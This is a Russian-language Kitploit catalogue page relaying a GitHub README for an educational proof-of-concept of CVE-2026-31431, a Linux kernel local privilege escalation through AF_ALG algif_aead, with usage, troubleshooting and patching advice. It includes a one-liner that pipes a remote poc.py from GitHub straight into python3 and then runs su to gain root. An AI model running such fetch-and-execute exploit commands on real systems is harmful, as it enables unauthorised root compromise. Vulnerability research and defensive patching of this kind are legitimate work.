Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-31431 — Учебный proof-of-concept, демонстрирующий локальное повышение привилегий в ядре Linux через AF_ALG algif_aead (CVE-2026-31431). Включает инструкции по использованию и рекомендации по смягчению последствий для оборонительных исследований. | Kitploit
Инструменты/GitHubGitHub/ademzero/cve-2026-31431
Повышение привилегийАнализ уязвимостейЭксплуатацияОбучение и Образование
GitHubademzero/cve-2026-31431

CVE-2026-31431

Учебный proof-of-concept, демонстрирующий локальное повышение привилегий в ядре Linux через AF_ALG algif_aead (CVE-2026-31431). Включает инструкции по использованию и рекомендации по смягчению последствий для оборонительных исследований.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-31431 — PoC «Copy Fail»

Образовательный Proof of Concept для CVE-2026-31431, также известной как Copy Fail, — уязвимости локального повышения привилегий в ядре Linux, затрагивающей криптографический интерфейс AF_ALG / algif_aead.

[!WARNING] Этот репозиторий предоставлен строго в образовательных, защитных и авторизованных исследовательских целях.

Не запускайте этот код на системах, которые вам не принадлежат, или на системах, где у вас нет явного письменного разрешения на тестирование.

Несанкционированное использование может быть незаконным.


Обзор

CVE-2026-31431 — это уязвимость локального повышения привилегий в ядре Linux, затрагивающая криптографическую подсистему ядра.

Уязвимость связана с путём AEAD, доступным через интерфейс AF_ALG, и может позволить локальному непривилегированному пользователю вмешиваться в данные page cache, связанные с читаемыми файлами, что потенциально может привести к повышению привилегий в уязвимых системах.

Этот репозиторий содержит минимальный образовательный Proof of Concept, предназначенный для контролируемых лабораторных сред.


Требования

Целевая система должна предоставлять требуемый алгоритм AEAD через AF_ALG.

Проверить это можно с помощью:

root@kitploit:~
grep -i "authencesn\|authenc" /proc/crypto

PoC ожидает поддержку алгоритма, аналогичного:

root@kitploit:~
authencesn(hmac(sha256),cbc(aes))

Если алгоритм недоступен, PoC может завершиться с ошибкой, например:

root@kitploit:~
FileNotFoundError: [Errno 2] No such file or directory

Это означает, что требуемый криптоалгоритм ядра недоступен в системе.


Использование

Клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/Karim33z/CVE-2026-31431.git
cd CVE-2026-31431

Запустите PoC:

root@kitploit:~
python3 poc.py

Или запустите напрямую:

root@kitploit:~
curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su

Примечания по совместимости

В некоторых системах Linux используется /bin/su вместо /usr/bin/su. Проверить правильный путь можно с помощью:

root@kitploit:~
which su

При необходимости измените целевой путь внутри poc.py.


Устранение неполадок

Отсутствует алгоритм AEAD

Если при привязке к authencesn(hmac(sha256),cbc(aes)) возникает ошибка FileNotFoundError: [Errno 2] No such file or directory, значит, требуемый алгоритм ядра недоступен.

Проверьте доступные криптоалгоритмы:

root@kitploit:~
cat /proc/crypto

или более конкретно:

root@kitploit:~
grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto

Неверный путь к su

Если PoC ссылается на /usr/bin/su, а ваша система использует /bin/su, проверьте с помощью:

root@kitploit:~
which su

Затем соответствующим образом обновите путь в poc.py.


Меры защиты

Специалистам по защите следует обновить ядро Linux до исправленной версии, предоставленной вендором дистрибутива.

После обновления ядра перезагрузите систему, чтобы убедиться, что исправленное ядро активно.

Временные меры могут включать ограничение доступа к затронутой криптофункциональности ядра в зависимости от окружения и дистрибутива.


Правовое уведомление

Этот проект предназначен только для:

  • Исследований в области безопасности
  • Защитной валидации
  • Образовательных целей
  • Авторизованного лабораторного тестирования

Автор не несёт ответственности за неправомерное использование, ущерб или незаконную деятельность, вызванную этим кодом.

Используйте только на системах, где у вас есть явное разрешение.


Лицензия

Этот проект лицензирован на условиях лицензии MIT.

Скачать инструмент